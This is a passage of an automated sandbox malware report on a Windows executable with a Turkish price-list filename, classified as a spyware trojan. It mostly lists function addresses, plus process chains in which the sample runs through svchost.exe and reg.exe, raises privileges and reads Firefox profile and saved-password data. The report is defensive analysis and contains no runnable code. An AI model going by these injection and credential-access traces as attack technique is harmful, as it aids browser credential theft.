                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F02_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B003E62_2_03B003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA3522_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC02C02_2_03AC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE02742_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B001AA2_2_03B001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF81CC2_2_03AF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A301002_2_03A30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA1182_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC81582_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD20002_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C02_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A407702_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A647502_2_03A64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C6E02_2_03A5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B005912_2_03B00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A405352_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEE4F62_2_03AEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE44202_2_03AE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF24462_2_03AF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF6BD72_2_03AF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB402_2_03AFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA802_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A02_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0A9A62_2_03B0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A569622_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A268B82_2_03A268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E8F02_2_03A6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4A8402_2_03A4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A428402_2_03A42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABEFA02_2_03ABEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4CFE02_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32FC82_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A82F282_2_03A82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60F302_2_03A60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE2F302_2_03AE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4F402_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52E902_2_03A52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFCE932_2_03AFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEEDB2_2_03AFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEE262_2_03AFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40E592_2_03A40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A58DBF2_2_03A58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3ADE02_2_03A3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4AD002_2_03A4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADCD1F2_2_03ADCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0CB52_2_03AE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30CF22_2_03A30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40C002_2_03A40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A8739A2_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D2_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C2_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A02_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C02_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4B1B02_2_03A4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7516C2_2_03A7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F1722_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B16B2_2_03B0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF70E92_2_03AF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF0E02_2_03AFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF0CC2_2_03AEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C02_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF7B02_2_03AFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC2_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADD5B02_2_03ADD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF75712_2_03AF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF43F2_2_03AFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A314602_2_03A31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FB802_2_03A5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB5BF02_2_03AB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7DBF92_2_03A7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFB762_2_03AFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADDAAC2_2_03ADDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A85AA02_2_03A85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE1AA32_2_03AE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEDAC62_2_03AEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB3A6C2_2_03AB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFA492_2_03AFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7A462_2_03AF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD59102_2_03AD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A499502_2_03A49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B9502_2_03A5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A438E02_2_03A438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD8002_2_03AAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFFB12_2_03AFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41F922_2_03A41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFF092_2_03AFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A49EB02_2_03A49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FDC02_2_03A5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7D732_2_03AF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43D402_2_03A43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF1D5A2_2_03AF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFCF22_2_03AFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB9C322_2_03AB9C32
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355A3524_2_0355A352
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035603E64_2_035603E6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034AE3F04_2_034AE3F0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035402744_2_03540274
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035202C04_2_035202C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035281584_2_03528158
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034901004_2_03490100
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0353A1184_2_0353A118
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035581CC4_2_035581CC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035541A24_2_035541A2
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035601AA4_2_035601AA
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035320004_2_03532000
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034C47504_2_034C4750
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A07704_2_034A0770
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0349C7C04_2_0349C7C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034BC6E04_2_034BC6E0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A05354_2_034A0535
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035605914_2_03560591
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035524464_2_03552446
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035444204_2_03544420
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0354E4F64_2_0354E4F6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355AB404_2_0355AB40
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03556BD74_2_03556BD7
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0349EA804_2_0349EA80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034B69624_2_034B6962
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A29A04_2_034A29A0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0356A9A64_2_0356A9A6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A28404_2_034A2840
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034AA8404_2_034AA840
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034CE8F04_2_034CE8F0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034868B84_2_034868B8
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03514F404_2_03514F40
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03542F304_2_03542F30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034E2F284_2_034E2F28
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034C0F304_2_034C0F30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03492FC84_2_03492FC8
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034ACFE04_2_034ACFE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0351EFA04_2_0351EFA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A0E594_2_034A0E59
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355EE264_2_0355EE26
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355EEDB4_2_0355EEDB
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355CE934_2_0355CE93
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034B2E904_2_034B2E90
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034AAD004_2_034AAD00
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0353CD1F4_2_0353CD1F
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0349ADE04_2_0349ADE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034B8DBF4_2_034B8DBF
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A0C004_2_034A0C00
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03490CF24_2_03490CF2
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03540CB54_2_03540CB5
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0348D34C4_2_0348D34C
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355132D4_2_0355132D
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034E739A4_2_034E739A
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034BB2C04_2_034BB2C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035412ED4_2_035412ED
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A52A04_2_034A52A0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D516C4_2_034D516C
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0348F1724_2_0348F172
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0356B16B4_2_0356B16B
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034AB1B04_2_034AB1B0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A70C04_2_034A70C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0354F0CC4_2_0354F0CC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355F0E04_2_0355F0E0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035570E94_2_035570E9
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355F7B04_2_0355F7B0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034E56304_2_034E5630
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035516CC4_2_035516CC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035575714_2_03557571
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035695C34_2_035695C3
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0353D5B04_2_0353D5B0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034914604_2_03491460
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355F43F4_2_0355F43F
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355FB764_2_0355FB76
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03515BF04_2_03515BF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034DDBF94_2_034DDBF9
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034BFB804_2_034BFB80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03557A464_2_03557A46
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355FA494_2_0355FA49
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03513A6C4_2_03513A6C
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0354DAC64_2_0354DAC6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034E5AA04_2_034E5AA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03541AA34_2_03541AA3
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0353DAAC4_2_0353DAAC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A99504_2_034A9950
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034BB9504_2_034BB950
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035359104_2_03535910
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0350D8004_2_0350D800
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A38E04_2_034A38E0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355FF094_2_0355FF09
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03463FD54_2_03463FD5
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03463FD24_2_03463FD2
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A1F924_2_034A1F92
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355FFB14_2_0355FFB1
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A9EB04_2_034A9EB0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A3D404_2_034A3D40
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03551D5A4_2_03551D5A
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03557D734_2_03557D73
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034BFDC04_2_034BFDC0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03519C324_2_03519C32
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355FCF24_2_0355FCF2
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C61D704_2_02C61D70
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5AE504_2_02C5AE50
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5CE604_2_02C5CE60
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5AF944_2_02C5AF94
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5AFA04_2_02C5AFA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5CC404_2_02C5CC40
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5CC374_2_02C5CC37
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C636004_2_02C63600
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C654004_2_02C65400
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C635FB4_2_02C635FB
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C7BAD04_2_02C7BAD0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_032AE2F44_2_032AE2F4
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_032AE7AC4_2_032AE7AC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_032AE4134_2_032AE413
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_032AD8784_2_032AD878
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 102 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 58 times
                Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 034E7E54 appears 110 times
                Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 0351F290 appears 89 times
                Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 0348B970 appears 280 times
                Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 0350EA12 appears 86 times
                Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 034D5130 appears 58 times
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: String function: 00197DE1 appears 35 times
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: String function: 001B0AE3 appears 70 times
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: String function: 001B8900 appears 42 times
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1125703734.0000000003BED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1124816597.0000000003A43000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@17/12
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FA06A GetLastError,FormatMessageW,0_2_001FA06A
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001E81CB AdjustTokenPrivileges,CloseHandle,0_2_001E81CB
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001E87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_001E87E1
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_001FB333
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_0020EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0020EE0D
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FC397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_001FC397
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00194E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00194E89
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeFile created: C:\Users\user\AppData\Local\Temp\autBBFD.tmpJump to behavior
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: reg.exe, 00000004.00000003.1462379918.0000000003060000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3579738318.000000000308C000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3579738318.00000000030AF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3579738318.0000000003081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1462496606.0000000003081000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeVirustotal: Detection: 36%
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeReversingLabs: Detection: 50%
                Source: unknownProcess created: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe"
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe"
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
                Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe"Jump to behavior
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: wldp.dllJump to behavior
